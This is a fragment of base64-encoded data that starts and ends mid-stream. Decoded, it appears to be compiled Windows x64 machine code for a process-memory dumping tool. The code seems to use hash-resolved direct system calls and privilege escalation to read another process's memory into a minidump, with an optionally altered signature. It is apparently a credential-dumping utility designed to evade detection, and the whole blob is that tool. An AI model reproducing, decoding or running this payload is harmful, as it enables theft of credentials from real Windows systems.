EyJTCQgSIPsKLlBNa8/6NEEAABIg8QoSItMJAhIi1QkEEyLRCQYTItMJCBJicoPBcNIiUwkCEiJVCQQTIlEJBhMiUwkIEiD7Ci5fzOeS+iRBAAASIPEKEiLTCQISItUJBBMi0QkGEyLTCQgSYnKDwXDSIlMJAhIiVQkEEyJRCQYTIlMJCBIg+wouQjIQhjoUQQAAEiDxChIi0wkCEiLVCQQTItEJBhMi0wkIEmJyg8Fw0iJTCQISIlUJBBMiUQkGEyJTCQgSIPsKLnsxlfQ6BEEAABIg8QoSItMJAhIi1QkEEyLRCQYTItMJCBJicoPBcNVSInlSIPsEEiJTRDHRfwAAAAAx0X4LL/TH+soi0X8jVABiVX8icJIi0UQSAHQD7cAZolF9g+3VfaLRfjByAgB0DFF+ItV/EiLRRBIAdAPtgCEwHXHi0X4SIPEEF3DVVNIgezIAAAASI2sJIAAAACLBfiWAACFwHQKuAEAAADpZgMAAMdFtGAAAACLRbRlSIsASIlFqEiLRahIiUUQSItFEEiLQBhIiUUISMdFOAAAAABIx0UwAAAAAEiLRQhIi0AQSIlFKOmhAAAASItFKEiLQDBIiUUwSItFMEiJRQBIi0UAi0A8SGPQSItFMEgB0EiJRfhIi0X4SAWIAAAASIlF8EiLRfCLAIlF7IN97AB0TItV7EiLRTBIAdBIiUU4SItFOItADInCSItFMEgB0EiJReBIi0XgiwANICAgID1udGRsdRtIi0XgSIPABIsADSAgICA9bC5kbHQk6wSQ6wGQSItFKEiLAEiJRShIi0UoSItAMEiFwA+FTv///+sBkEiDfTgAdQq4AAAAAOlZAgAASItFOItAGIlFJEiLRTiLQByJwkiLRTBIAdBIiUXYSItFOItAIInCSItFMEgB0EiJRdBIi0U4i0AkicJIi0UwSAHQSIlFyMdFIAAAAABIjQWNlQAASIlFwItFJIPoAYnASI0UhQAAAABIi0XQSAHQiwCJwkiLRTBIAdBIiUW4SItFuA+3AGY9Wnd1bYtFIEiNFMUAAAAASItFwEiNHAJIi0W4SInB6Mb9//+JA4tFJIPoAYnASI0UAEiLRchIAdAPtwAPt8BIjRSFAAAAAEiLRdhIAdCLVSBIjQzVAAAAAEiLVcBIAcqLAIlCBINFIAGBfSD0AQAAdBCDbSQBg30kAA+FUv///+sBkItFIIkFy5QAAMdFHAAAAADpJAEAAMdFGAAAAADp/wAAAItFGEiNFMUAAAAASItFwEgB0ItQBItFGIPAAYnASI0MxQAAAABIi0XASAHIi0AEOcIPhsQAAACLRRhIjRTFAAAAAEiLRcBIAdCLAIlFoItFGEiNFMUAAAAASItFwEgB0ItABIlFpItFGIPAAYnASI0UxQAAAABIi0XASAHQi1UYSI0M1QAAAABIi1XASAHKiwCJAotFGIPAAYnASI0UxQAAAABIi0XASAHQi1UYSI0M1QAAAABIi1XASAHKi0AEiUIEi0UYg8ABicBIjRTFAAAAAEiLRcBIAcKLRaCJAotFGIPAAYnASI0UxQAAAABIi0XASAHCi0WkiUIEg0UYAYsFrpMAACtFHIPoATlFGA+C7P7//4NFHAGLBZWTAACD6AE5RRwPgsr+//+4AQAAAEiBxMgAAABbXcNVSInlSIPsMIlNEOhb/P//hcB1E0iNDT+zAADoevj//7j/////60vHRfwAAAAA6yOLRfxIjRTFAAAAAEiNBTyTAACLBAI5RRB1BYtF/Osjg0X8AYsFIZMAADlF/HLSi1UQSI0NErMAAOgt+P//uP////9Ig8QwXcNVSInlSIPsMEiJTRCJVRhMiUUgRIlNKEiLRRBIi0AISInCi0UYSAHQSIlF+ItNKEiLVSBIi0X4SYnISInB6LCCAACQSIPEMF3DVUiJ5UiD7CBIiU0QSIlVGESJRSBIi0UQi1AQi0UgAdA9AABgBHYOSI0Ns7IAAOim9///6zJIi0UQi0AQi00gSItVGEGJyUmJ0InCSItNEOhj////SItFEItQEItFIAHCSItFEIlQEJBIg8QgXcNVSIHs4AQAAEiNrCSAAAAASImNcAQAAEiJlXgEAABEiYWABAAAi4WABAAASImF+AMAAEiLBXoEAQD/0EG4EAAAALoIAAAASInBSIsFcwQBAP/QSImFWAQAAEiDvVgEAAAAdSdIiwVBBAEA/9BBicC6EAAAAEiNDSiyAADo6/b//7gAAAAA6XcCAABIjUXgQbgEAQAASIuVcAQAAEiJweiggQAASI2F8AEAAEiNFSiyAABIicHoMoEAAEiNVeBIjYXwAQAAQbgEAQAASInB6AmBAABIi4VYBAAASI2V8AEAAEiJUAhIi4VYBAAASItACLoEAQAASInB6M8yAACJwkiLhVgEAABmiRBIi4VYBAAAD7cAjRQASIuFWAQAAGaJEEiLhVgEAAAPtwCNUAJIi4VYBAAAZolQAseFEAQAADAAAABIx4UYBAAAAAAAAMeFKAQAAEAAAABIi4VYBAAASImFIAQAAEjHhTAEAAAAAAAASMeFOAQAAAAAAABMjYUABAAASI2NEAQAAEiNhUgEAADHRCRQAAAAAEjHRCRIAAAAAMdEJEAgAAAAx0QkOAUAAADHRCQwAAAAAMdEJCiAAAAASI2V+AMAAEiJVCQgTYnBSYnIup8BEgBIicHof/j//4mFVAQAAEiLBccCAQD/0EiLlVgEAABJidC6AAAAAEiJwUiLBcQCAQD/0EjHhVgEAAAAAAAAgb1UBAAAOgAAwHUdSIuVcAQAAEiNDbWwAADoOPX//7gAAAAA6cQAAACDvVQEAAAAeR6LhVQEAACJwkiNDa6wAADoEfX//7gAAAAA6Z0AAABIi4VIBAAASMdEJEAAAAAASMdEJDgAAAAAi5WABAAAiVQkMEiLlXgEAABIiVQkKEiNlQAEAABIiVQkIEG5AAAAAEG4AAAAALoAAAAASInB6Ob3//+JhVQEAABIi4VIBAAASInB6NH1//9Ix4VIBAAAAAAAAIO9VAQAAAB5G4uFVAQAAInCSI0NQ7AAAOh29P//uAAAAADrBbgBAAAASIHE4AQAAF3DVUiJ5UiD7GBIjQVKsAAASIlF+EiNRdBIjVAESItF+EmJ0EiJwrkAAAAASIsFUAEBAP/QiUX0g330AHUhSIsFXgEBAP/QicJIjQ0zsAAA6A70//+4AAAAAOmpAAAASI1F6EmJwLooAAAASMfB/////+hf9f//iUXwg33wAHkYi0XwicJIjQ0vsAAA6NLz//+4AAAAAOtwx0XQAQAAAMdF3AIAAABIi0XoSI1V0EjHRCQoAAAAAEjHRCQgAAAAAEG5EAAAAEmJ0LoAAAAASInB6MD1//+JRfBIi0XoSInB6LH0//+DffAAeRiLRfCJwkiNDfyvAADoZ/P//7gAAAAA6wW4AQAAAEiDxGBdw1VIieVIg+xwiU0QSMdF8AAAAADHRcAwAAAASMdFyAAAAADHRdgAAAAASMdF0AAAAABIx0XgAAAAAEjHRegAAAAASMdFsAAAAABIx0W4AAAAAItFEEiJRbBIx0W4AAAAAEiNTbBIjVXASI1F8EmJyUmJ0LoQBAAASInB6Enz//+JRfyBffwLAADAdRaLVRBIjQ2IrwAA6Lvy//+4AAAAAOtBgX38IgAAwHUWi1UQSI0Nka8AAOic8v//uAAAAADrIoN9/AB5GItF/InCSI0Nk68AAOh+8v//uAAAAADrBEiLRfBIg8RwXcNVSInliU0Qi0UQwegYicKLRRDB6AglAP8AAAnCi0UQweAIJQAA/wAJwotFEMHgGAnQXcNVSInlSIPscEiJTRBIi0UQSItAGIsAicHosP///4lF0GbHRdSTp2bHRdYAAMdF2AMAAADHRdwgAAAAx0XgAAAAAMdF5AAAAADHRegAAAAAx0XsAAAAAMdF/AAAAACLRfxImEiNVbBIAcKLRdCJAoNF/ASLRfxImEiNVbBIAcIPt0XUZokCg0X8AotF/EiYSI1VsEgBwg+3RdZmiQKDRfwCi0X8SJhIjVWwSAHCi0XYiQKDRfwEi0X8SJhIjVWwSAHCi0XciQKDRfwEi0X8SJhIjVWwSAHCi0XgiQKDRfwEi0X8SJhIjVWwSAHCi0XkiQKDRfwEi0X8SJhIjVWwSAHCi0XoiQKDRfwEi0X8SJhIjVWwSAHCi0XsiQJIjUWwQbggAAAASInCSItNEOgx+f//kEiDxHBdw1VTSIPsOEiNrCSAAAAASIlN0EiJ08dFrAAAAACLRaxImEiNVaBIAcKLA4kCg0WsBItFrEiYSI1VoEgBwotDBIkCg0WsBItFrEiYSI1VoEgBwotDCIkCSI1FoEG4DAAAAEiJwkiLTdDovvj//5BIg8Q4W13DVUiJ5UiD7GBIiU0Qx0X0BwAAAMdF+AAAAADHRfwAAAAASItF9EiJRcCLRfyJRchIjUXASInCSItNEOhN////x0XoBAAAAMdF7AAAAADHRfAAAAAASItF6EiJRcCLRfCJRchIjUXASInCSItNEOga////x0XcCQAAAMdF4AAAAADHReQAAAAASItF3EiJRcCLReSJRchIjUXASInCSItNEOjn/v//kEiDxGBdw1VIieVIgezgAAAASIlNEMdFyGAAAACLRchlSIsASIlFwEiLRcBIiUX4SItF+EgFGAEAAEiJRfBIi0X4SAUcAQAASIlF6EiLRfhIBSABAABIiUXgSItF+EgFJAEAAEiJRdhIi0X4SAXoAgAASIlF0GbHRZAJAGbHRZIAAGbHRZQAAMZFlgDGRZcBSItF8IsAiUWYSItF6IsAiUWcSItF4A+3AA+3wIlFoEiLRdiLAIlFpMdFqAAAAABmx0WsAABmx0WuAABIx0WwAAAAAEjHRbgAAAAAx0WMMAAAAMdFzAAAAACLRcxImEiNlVD///9IAcIPt0WQZokCg0XMAotFzEiYSI2VUP///0gBwg+3RZJmiQKDRcwCi0XMSJhIjZVQ////SAHCD7dFlGaJAoNFzAKLRcxImEiNlVD///9IAcIPtkWWiAKDRcwBi0XMSJhIjZVQ////SAHCD7ZFl4gCg0XMAYtFzEiYSI2VUP///0gBwotFmIkCg0XMBItFzEiYSI2VUP///0gBwotFnIkCg0XMBItFzEiYSI2VUP///0gBwotFoIkCg0XMBItFzEiYSI2VUP///0gBwotFpIkCg0XMBItFzEiYSI2VUP///0gBwotFqIkCg0XMBItFzEiYSI2VUP///0gBwg+3RaxmiQKDRcwCi0XMSJhIjZVQ////SAHCD7dFrmaJAoNFzAKLRcxImEiNlVD///9IAcJIi0WwSIkCg0XMCItFzEiYSI2VUP///0gBwkiLRbhIiQKDRcwISItFEItAEImFTP///4tVjEiNhVD///9BidBIicJIi00Q6KL1//9IjUWMQbkEAAAASYnAuiQAAABIi00Q6D71//9IjYVM////QbkEAAAASYnAuigAAABIi00Q6CD1//9Ii0UQi0AQiYVI////SItF0A+3AA+3wImFRP///0iNhUT///9BuAQAAABIicJIi00Q6DP1//9Ii0XQD7cAD7fQSItF0EiLQAhBidBIicJIi00Q6BL1//+LhUz///+DwBhIjZVI////QbkEAAAASYnQicJIi00Q6KX0//+4AQAAAEiBxOAAAABdw1VIieVIg+xwSIlNEMdF/AAAAABIjVXAi0X8SMdEJCAAAAAAQbkwAAAASYnQicJIi00Q6DXu//+JRfiDffgAeRiLRfiJwkiNDa2pAADoaOz//7gAAAAA6wRIi0XISIPEcF3DVUiB7AADAABIjawkgAAAAEiJjZACAABIiZWYAgAARImFoAIAAESJjagCAABIx4V4AgAAAAAAAMeFdAIAAAAAAABIi42QAgAA6FH///9IiYVYAgAASIO9WAIAAAB1CrgAAAAA6cQEAABmx4VWAgAACABIi4VYAgAASIPAGEiJhUgCAABID7+NVgIAAEiNlRgCAABIi4VIAgAASMdEJCAAAAAASYnJSYnQSInCSIuNkAIAAOiT7P//iYVEAgAAgb1EAgAADQAAgHUTg72oAgAAAHUKuAAAAADpUAQAAIO9RAIAAAB5HouFRAIAAInCSI0N46gAAOhe6///uAAAAADpKQQAAEiLhRgCAABIg8AgSImFOAIAAEgPv41WAgAASI2VEAIAAEiLhTgCAABIx0QkIAAAAABJiclJidBIicJIi42QAgAA6AHs//+JhUQCAACDvUQCAAAAeR6LhUQCAACJwkiNDXCoAADo6+r//7gAAAAA6bYDAABIi4UQAgAASImFMAIAAGbHhXICAAAAAOlYAwAASIuFEAIAAEiNlbABAABIx0QkIAAAAABBuVgAAABJidBIicJIi42QAgAA6Inr//+JhUQCAACDvUQCAAAAeR6LhUQCAACJwkiNDfinAADoc+r//7gAAAAA6T4DAADHhWwCAAAAAAAAx4VoAgAAAAAAAOmzAgAAi4VoAgAASJhIjRTFAAAAAEiLhZgCAABIAdBIiwC6/wAAAEiJweiGJgAAZomFLgIAAA+/hS4CAACNFAAPt4X4AQAAD7fAOcIPhV4CAACDvWwCAAAAD4WBAAAASI1FsEG4AAIAALoAAAAASInB6Kd0AAAPt4X4AQAAD7fISIuFAAIAAEiNVbBIx0QkIAAAAABJiclJidBIicJIi42QAgAA6J/q//+JhUQCAACDvUQCAAAAeR6LhUQCAACJwkiNDQ6nAADoien//7gAAAAA6VQCAADHhWwCAAABAAAAi4VoAgAASJhIjRTFAAAAAEiLhZgCAABIAdBIiwBIjVWwSInBSIsFqvcAAP/QhcAPhZwBAACLhWgCAABImEiNFMUAAAAASIuFmAIAAEgB0EiLAEiNFdCmAABIicFIiwVy9wAA/9CFwHUKx4V0AgAAAQAAAEiLBUP2AAD/0EG4GAEAALoIAAAASInBSIsFPPYAAP/QSImFIAIAAEiDvSACAAAAdSdIiwUK9gAA/9BBicC6GAEAAEiNDfGjAADotOj//7gAAAAA6X8BAABIi4UgAgAASMcAAAAAAEiLldABAABIi4UgAgAASIlQCIuV4AEAAEiLhSACAACJUBAPt4XoAQAAD7fQSIuFIAIAAEiNSBRIi4XwAQAASMdEJCAAAAAASYnRSYnISInCSIuNkAIAAOgz6f//iYVEAgAAg71EAgAAAHkei4VEAgAAicJIjQ2ipQAA6B3o//+4AAAAAOnoAAAASIO9eAIAAAB1EEiLhSACAABIiYV4AgAA60FIi4V4AgAASImFYAIAAOsRSIuFYAIAAEiLAEiJhWACAABIi4VgAgAASIsASIXAdeBIi4VgAgAASIuVIAIAAEiJEA+3hXICAACDwAFmiYVyAgAA6wGQg4VoAgAAAYuFaAIAADuFoAIAAA+MO/3//0iLhbABAABIiYUQAgAASIuFEAIAAEg5hTACAAB0FQ+/hXICAAA5haACAAAPj5X8///rAZCDvagCAAAAdByDvXQCAAAAdRNIjQ0OpQAA6Dnn//+4AAAAAOsHSIuFeAIAAEiBxAADAABdw1VIgezQAQAASI2sJIAAAABIiY1gAQAASI0FuKQAAEiJhaAAAABIjQXspAAASImFqAAAAEiNBfSkAABIiYWwAAAASI0F+qQAAEiJhbgAAABIjQUEpQAASImFwAAAAEiNBRClAABIiYXIAAAASI0FGqUAAEiJhdAAAABIjQUmpQAASImF2AAAAEiNBS6lAABIiYXgAAAASI0FOqUAAEiJhegAAABIjQVApQAASImF8AAAAEiNBUilAABIiYX4AAAASI0FUKUAAEiJhQABAABIjQVYpQAASImFCAEAAEiNBWilAABIiYUQAQAASI0FdKUAAEiJhRgBAABIjQV+pQAASImFIAEAAEiNBYilAABIiYUoAQAASIuFYAEAAEiLAEiNlaAAAABBuQEAAABBuBIAAABIicHok/n//0iJhUABAABIg71AAQAAAHUKuAAAAADp5QQAAEiLhUABAABIiYVIAQAAx4WcAAAAAAAAAOmcAAAAi4WcAAAAg8ABiYWcAAAASIuFYAEAAItQEEiLhUgBAACJkBQBAABIi4VIAQAASIPAFLoAAQAASInB6NQhAACJRRiLRRiDwAGJRRiLRRgBwIlFGEiNRRhBuAQAAABIicJIi41gAQAA6G7t//+LVRhIi4VIAQAASIPAFEGJ0EiJwkiLjWABAADoTu3//0iLhUgBAABIiwBIiYVIAQAASIO9SAEAAAAPhVb///9Ii4VgAQAAi0AQiYWYAAAASI2FnAAAAEG4BAAAAEiJwkiLjWABAADoA+3//0iLhUABAABIiYVIAQAA6XwDAABIi4VIAQAASItACEiJRaBIi4VIAQAAi0AQiUWox0WsAAAAAMdFsAAAAABIi4VIAQAAi4AUAQAAiUW0x0W4AAAAAMdFvAAAAADHRcAAAAAAx0XEAAAAAMdFyAAAAADHRcwAAAAAx0XQAAAAAMdF1AAAAADHRdgAAAAAx0XcAAAAAMdF4AAAAADHReQAAAAAx0XoAAAAAMdF7AAAAADHRfAAAAAAx0X0AAAAAMdF+AAAAABIx0UAAAAAAEjHRQAAAAAAx4U8AQAAAAAAAIuFPAEAAEiYSI1VIEgBwkiLRaBIiQKDhTwBAAAIi4U8AQAASJhIjVUgSAHCi0WoiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0WsiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0WwiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0W0iQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0W4iQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0W8iQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XAiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XEiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XIiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XMiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XQiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XUiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XYiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XciQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XgiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XkiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XoiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XsiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0XwiQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0X0iQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCi0X4iQKDhTwBAAAEi4U8AQAASJhIjVUgSAHCSItFAEiJAoOFPAEAAAiLhTwBAABImEiNVSBIAcJIi0UISIkCSI1FIEG4bAAAAEiJwkiLjWABAADohen//0iLhUgBAABIiwBIiYVIAQAASIO9SAEAAAAPhXb8//+LhZwAAABrwGyDwASJRRxIjUUcQbkEAAAASYnAujAAAABIi41gAQAA6PDo//9IjYWYAAAAQbkEAAAASYnAujQAAABIi41gAQAA6M/o//9Ii4VAAQAASIHE0AEAAF3DVUiJ5UiD7FBIiU0QSIN9EAAPhJQAAADHRfwBAAAASItFEEiJRfDrD4NF/AFIi0XwSIsASIlF8EiLRfBIiwBIhcB15YtF/IPoAYlF7OtVSItFEEiJReCLReyJRdzrC0iLReBIiwBIiUXgi0XcjVD/iVXchcB16EiLBaztAAD/0EiLVeBJidC6AAAAAEiJwUiLBaztAAD/0EjHReAAAAAAg23sAYN97AB5pesBkEiDxFBdw1VIieVIg+wQSIlNEEiJVRhIi0UYSIlF+Os9SItF+EiLQAhIOUUQciRIi0X4SItACEiJwkiLRfiLQBCJwEgB0Eg5RRBzB7gBAAAA6xdIi0X4SIsASIlF+EiDffgAdby4AAAAAEiDxBBdw1VIieVIgeywAAAASIlNEEiJVRhIx0X4AAAAAEjHRfAAAAAAx0XkAAAAAEiLRRBIiwBMjUWAi03kSItV8EjHRCQoAAAAAEjHRCQgMAAAAE2JwUGJyEiJwehd4f//iUXgg33gAA+IbQEAAEiLRYBIiUXYSItFmEiJRdBIi1XYSItF0EgB0EiJRfDHRcwAEAAAx0XIAAAAAcdFxAAABADHRcABAAAAx0W8AAEAAItFoDlFzA+FAQEAAItFpDlFwA+E+wAAAItFqDlFxA+E9QAAAItFpCNFvDlFvA+E7AAAAItFqDlFyHUYSItF2EiLVRhIicHoof7//4XAD4TSAAAASIsFCewAAP/QQbgYAAAAuggAAABIicFIiwUC7AAA/9BIiUWwSIN9sAB1J0iLBdbrAAD/0EGJwLoYAAAASI0NvZkAAOiA3v//uAAAAADpiwAAAEiLRbBIxwAAAAAASItV2EiLRbBIiVAISItFsEiLVdBIiVAQSIN9+AB1DUiLRbBIiUX46aP+//9Ii0X4SIlF6OsLSItF6EiLAEiJRehIi0XoSIsASIXAdelIi0XoSItVsEiJEOly/v//kOls/v//kOlm/v//kOlg/v//kOla/v//kOlU/v//kEiLRfhIgcSwAAAAXcNVU0iD7HhIjawkgAAAAEiJTRBIiVUYSItFEItAEIlF0EiLRRhIicJIi00Q6Oz9//9IiUXgSIN94AB1CrgAAAAA6SYCAABIx0XIAQAAAEiLReBIiUXo6wtIi0XoSIsASIlF6EiLRehIiwBIhcB0EUiLRchIjVABSIlVyEiFwHXYSI1FyEG4CAAAAEiJwkiLTRDodOX//0iLRchIg8ABweAEiUXEi1XQi0XEAdCJwEiJRbhIjUW4QbgIAAAASInCSItNEOhC5f//SItF4EiJRejrP0iLRehIg8AIQbgIAAAASInCSItNEOge5f//SItF6EiDwBBBuAgAAABIicJIi00Q6ATl//9Ii0XoSIsASIlF6EiDfegAdbpIjUXEQbkEAAAASYnAujwAAABIi00Q6I7k//9IjUXQQbkEAAAASYnAukAAAABIi00Q6HPk//9Ii0XgSIlF6OkCAQAASItF6EiLWBBIiwXB6QAA/9BJidi6CAAAAEiJwUiLBb3pAAD/0EiJRdhIg33YAHUvSIsFkekAAP/QicJIi0XoSItAEEGJ0EiJwkiNDcibAADoM9z//7gAAAAA6bIAAABIi0XoSItIEEiLRehIi0AISYnCSItFEEiLAEiLVdhIx0QkIAAAAABJiclJidBMidJIicHo5Nz//4lF1IN91AB5EYtF1InCSI0NpJsAAOjX2///SItF6EiLQBCJwkiLRdhBidBIicJIi00Q6OHj//9IiwX76AAA/9BIi1XYSYnQugAAAABIicFIiwX76AAA/9BIx0XYAAAAAEiLRehIiwBIiUXoSIN96AAPhfP+//9Ii0XgSIPEeFtdw1VIieVIg+wwSIlNEEiLTRDoIen//0iLTRDow+r//0iLTRDoZuv//4XAdQe4AAAAAOtqSItNEOgT9P//SIlF+EiDffgAdQe4AAAAAOtPSItF+EiJwkiLTRDoMf3//0iJRfBIg33wAHUHuAAAAADrLUiLRfhIicHoFPr//0jHRfgAAAAASItF8EiJwegA+v//SMdF8AAAAAC4AQAAAEiDxDBdw1VIieVIg+xQSMdF6AAAAABIi0XoSI1V6EiJVCQgQbkAAAAAQbgAAAAAuhAEAABIicHoS9v//4lF/IF9/BoAAIB1E0iNDZ2aAADogNr//7gAAAAA62yDffwAeRiLRfyJwkiNDaeaAADoYtr//7gAAAAA605IjQXEmgAASIlF4EiLRehIjVXgQbkAAAAAQbgBAAAASInB6N3t//9IiUXwSIN98AAPhGf///9Ii0XwSInB6Dj5//9Ix0XwAAAAAEiLRehIg8RQXcNVSInlSIlNEIlVGJBdw1VIieVIg+wgSIlNEEiLVRBIjQ1qmgAA6N3Z//9IjQ2qmgAA6NHZ//9IjQ26mgAA6MXZ//9IjQ3VmgAA6LnZ//9IjQ3amgAA6K3Z//9IjQ0LmwAA6KHZ//9IjQ0amwAA6JXZ//9IjQ03mwAA6InZ//9IjQ1CmwAA6H3Z//+QSIPEIF3DVUiJ5UiD7DBIiU0QSI1F+EiJweiy2f//icHoB2QAAEiLRRDGAFBIi0UQSIPAAcYATUiLRRBIg8ACxgBESItFEEiDwAPGAE3rQOjoYwAAicJIi0UQiBDo22MAAInCSItFEEiDwAGIEOjKYwAAicJIi0UQSIPAAogQ6LljAACJwkiLRRBIg8ADiBBBuAQAAABIjRXOmgAASItNEOhvYwAAhcB0ppCQSIPEMF3DVVdWSInlSIHskAAAAIlNIEiJVSjo0gUAAMdF/AAAAABIx0XwAAAAAEiNRdhIicHoIf///8dF6AEAAADpmQIAAItF6EiYSI0UxQAAAABIi0UoSAHQSIsASInCSI0FXZoAALkDAAAASInWSInH86YPl8APksIp0A++wIXAdD2LRehImEiNFMUAAAAASItFKEgB0EiLAEiJwkiNBSOaAAC5CAAAAEiJ1kiJx/OmD5fAD5LCKdAPvsCFwHUVxkXYUMZF2U3GRdpExkXbTekGAgAAi0XoSJhIjRTFAAAAAEiLRShIAdBIiwBIicJIjQXZmQAAuQMAAABIidZIicfzpg+XwA+SwinQD77AhcB0PYtF6EiYSI0UxQAAAABIi0UoSAHQSIsASInCSI0Fn5kAALkIAAAASInWSInH86YPl8APksIp0A++wIXAdSSDRegBi0XoSJhIjRTFAAAAAEiLRShIAdBIiwBIiUXw6WgBAACLRehImEiNFMUAAAAASItFKEgB0EiLAEiJwkiNBUaZAAC5AwAAAEiJ1kiJx/OmD5fAD5LCKdAPvsCFwHQ9i0XoSJhIjRTFAAAAAEiLRShIAdBIiwBIicJIjQUMmQAAuQYAAABIidZIicfzpg+XwA+SwinQD77AhcB1K4NF6AGLRehImEiNFMUAAAAASItFKEgB0EiLAEiJwejhYQAAiUX86cMAAACLRehImEiNFMUAAAAASItFKEgB0EiLAEiJwkiNBaqYAAC5AwAAAEiJ1kiJx/OmD5fAD5LCKdAPvsCFwHQ9i0XoSJhIjRTFAAAAAEiLRShIAdBIiwBIicJIjQVwmAAAuQcAAABIidZIicfzpg+XwA+SwinQD77AhcB1GUiLRShIiwBIicHoN/z//7gAAAAA6YMCAACLRehImEiNFMUAAAAASItFKEgB0EiLAEiJwkiNDSGYAADoANb//7j/////6VMCAACDRegBi0XoO0UgD4xb/f//SIN98AB1GUiLRShIiwBIicHo1/v//7j/////6SMCAABIi0XwulwAAABIicHoRWAAAEiFwHUdSItF8EiJwkiNDdqXAADondX//7j/////6fABAADoLeH//4lF7IN97AB1DEiNDd6XAADoedX//4N9/AB0EItF/InB6BTi//9IiUXg6wnokPr//0iJReBIg33gAHUKuP/////ppgEAAEjHRdAAAAAASMdFyAAAYARIjVXISI1F0MdEJCgEAAAAx0QkIAAQAABJidFBuAAAAABIicJIx8H/////6HzX//+JRdyDfdwAeSpIi0XgSInB6CfW//9Ix0XgAAAAAEiNDYWXAADo4NT//7j/////6TMBAABIi0XgSIlFoEiLRdBIiUWox0WwAAAAAEiNRdhIiUW4SI1FoEiJweg7+f//iUXsi1WwSItFqEiJweiS+v//g33sAHQZi02wSItVqEiLRfBBichIicHoEt3//4lF7ItFsInCSItF0EmJ0LoAAAAASInB6ClfAABIjVXISI1F0EG5AIAAAEmJ0EiJwkjHwf/////o9Nb//4lF3IN93AB5EYtF3InCSI0NBJcAAOgn1P//SItF4EiJwehO1f//SMdF4AAAAACDfewAdGVIjUXYQbgEAAAASI0V6pUAAEiJweiMXgAAhcB0JEiLRfC6XAAAAEiJwehvXgAASIPAAUiJwkiNDeGWAADozNP//0iLRfC6XAAAAEiJwehLXgAASIPAAUiJwkiNDR2XAADoqNP//7gAAAAASIHEkAAAAF5fXcOQkJCQkJCQkEiD7ChIiwUlfgAASIsASIXAdCIPH0QAAP/QSIsFD34AAEiNUAhIi0AISIkVAH4AAEiFwHXjSIPEKMNmDx9EAABWU0iD7ChIixWDnQAASIsCicGD+P90OYXJdCCJyIPpAUiNHMJIKchIjXTC+A8fQAD/E0iD6whIOfN19UiNDX7///9Ig8QoW17pw9L//w8fADHAZg8fRAAARI1AAYnBSoM8wgBMicB18OutZg8fRAAAiwXazQAAhcB0BsMPH0QAAMcFxs0AAAEAAADpcf///5BI/yWp4AAAkJCQkJCQkJCQMcDDkJCQkJCQkJCQkJCQkEiD7CiD+gN0F4XSdBO4AQAAAEiDxCjDZg8fhAAAAAAA6MsJAAC4AQAAAEiDxCjDkFZTSIPsKEiLBYOcAACDOAJ0BscAAgAAAIP6AnQTg/oBdE64AQAAAEiDxChbXsNmkEiNHVntAABIjTVS7QAASDnedN8PH0QAAEiLA0iFwHQC/9BIg8MISDnede24AQAAAEiDxChbXsNmDx+EAAAAAADoSwkAALgBAAAASIPEKFtew2ZmLg8fhAAAAAAADx9AADHAw5CQkJCQkJCQkJCQkJBWU0iD7HgPEXQkQA8RfCRQRA8RRCRggzkGD4fNAAAAiwFIjRXslgAASGMEgkgB0P/gDx+AAAAAAEiNHYeWAADyRA8QQSDyDxB5GPIPEHEQSItxCLkCAAAA6ENiAADyRA8RRCQwSYnYSI0VepYAAPIPEXwkKEiJwUmJ8fIPEXQkIOhTXAAAkA8QdCRADxB8JFAxwEQPEEQkYEiDxHhbXsOQSI0dWZUAAOuWDx+AAAAAAEiNHYmVAADrhg8fgAAAAABIjR1ZlQAA6XP///8PH0AASI0duZUAAOlj////Dx9AAEiNHYGVAADpU////0iNHf2UAADpR////5CQkJCQkJCQ2+PDkJCQkJCQkJCQkJCQkEFUU0iD7DhJicxIjUQkWLkCAAAASIlUJFhMiUQkYEyJTCRoSIlEJCjoY2EAAEG4GwAAALoBAAAASI0N4ZUAAEmJwehpWwAASItcJCi5AgAAAOg6YQAATIniSInBSYnY6ORaAADof1sAAJBmDx9EAABBVFZTSIPsUEhjHcXLAABJicyF2w+OFgEAAEiLBbfLAAAxyUiDwBhmDx+EAAAAAABIixBMOeJ3FEyLQAhFi0AITAHCSTnUD4KHAAAAg8EBSIPAKDnZddlMieHoUQkAAEiJxkiFwA+E5wAAAEiLBWbLAABIjRybSMHjA0gB2EiJcCDHAAAAAADoVAoAAItODEiNVCQgQbgwAAAASAHBSIsFNMsAAEiJTBgY/xVJ3QAASIXAD4R/AAAAi0QkRI1QwIPiv3QIjVD8g+L7dRSDBQHLAAABSIPEUFteQVzDDx9AAIP4AkiLTCQgSItUJDhBuAQAAAC4QAAAAEQPRcBIAx3VygAASIlLCEmJ2UiJUxD/FdzcAACFwHW0/xVy3AAASI0NA5UAAInC6GT+//8PH0AAMdvpIP///0iLBZrKAACLVghIjQ2olAAATItEGBjoPv7//0yJ4kiNDXSUAADoL/7//5BmZi4PH4QAAAAAAA8fAFVBV0FWQVVBVFdWU0iD7DhIjawkgAAAAIs9QsoAAIX/dBZIjWW4W15fQVxBXUFeQV9dww8fRAAAxwUeygAAAQAAAOh5CAAASJhIjQSASI0ExQ8AAABIg+Dw6KIKAABMiyXLmAAASIsd1JgAAMcF7skAAAAAAABIKcRIjUQkIEiJBePJAABMieBIKdhIg/gHfpGLE0iD+AsPjysBAACF0g+FmwEAAItDBIXAD4WQAQAAi1MIg/oBD4XFAQAASIPDDEw54w+DWf///0yLLZCYAABJvgAAAAD/////6zEPH0AAD7YWSInxSYnQSYHIAP///4TSSQ9I0Egpw